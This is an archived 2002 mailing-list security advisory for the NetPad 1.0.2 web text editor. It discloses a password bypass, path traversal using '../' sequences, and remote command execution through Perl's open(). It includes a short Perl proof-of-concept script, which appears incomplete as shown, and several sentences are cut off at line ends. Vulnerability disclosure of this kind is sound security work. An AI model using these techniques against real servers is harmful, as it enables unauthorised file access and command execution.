LevCGI.coms NetPad 1.0.2 multiple vulnerabilities

From: BrainRawt . (brainrawtat_private)
Date: Mon May 13 2002 - 18:44:28 PDT

  • Next message: Matthew G. Marsh: "Re: Linux kernel 2.4 "weak end host" issue Explained"

    Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
    Discovered By b0iler(b0ilerat_private) and 
    About Netpad:
    <quote from levcgi.com>
    Easy to install and use text editor for your web browser! This NotePad like
    program allows you to open your files and pages online in your browser and
    edit their contents through the browser without forcing you to re-upload
    your changes all the time! Extremely effecient and a must have tool for all
    </quote from levcgi.com>
    According to the website,  ...NetPad has been downloaded 1225 times!
    Vulnerable (tested) Versions:
    NetPad v 1.0.2
    Vendor Contact:
    4-28-02 - Emailed levat_private
    -- Password Bypass
    1. The website claims "password security feature to prevent unauthorized 
        but this is NOT true.
        A password is not required to read files.  It is only required to write 
    to files.
    -- Path Traversal
    2. Improper filtering of input allows one to enter the traditional 
    "../../../" into
        the input field to crawl back through directories of the server hosting 
        allowing one to view any file readable by the webserver.
    -- Command Execution
    3. Due to improper usage of the open() function and input filtering, it is 
        for a malicious visitor to remotely execute commands on the server 
        Proof of Concept code can be found below............
    Remote Command Execution Exploit (POC):
    # exploit for levcgi's NetPad 1.0.2
    # This could easily be done with any browser and alittle effort.
    # requires LWP avaliable at
    # http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
    # also, the number of ../'s differs.  It depends on what $basedir
    # is set to in the netpad.cgi script
    # usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi 
    use LWP::UserAgent;
    $ua = new LWP::UserAgent;
    $ua->agent("your open call can be exploited" . $ua->agent);
    my $req = new HTTP::Request POST => $ARGV[0];
    foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
    my $res = $ua->request($req);
    if ($res->is_success) { print $res->content . "\n\nit should have 
    worked.\n"; }
    else {  print "request failed.\n"; }
    No matter how well one filters input to this program, we recommend that the
    program itself be protected by htaccess.
    Did you (Lev) say something about stupid people doing stupid things? - 
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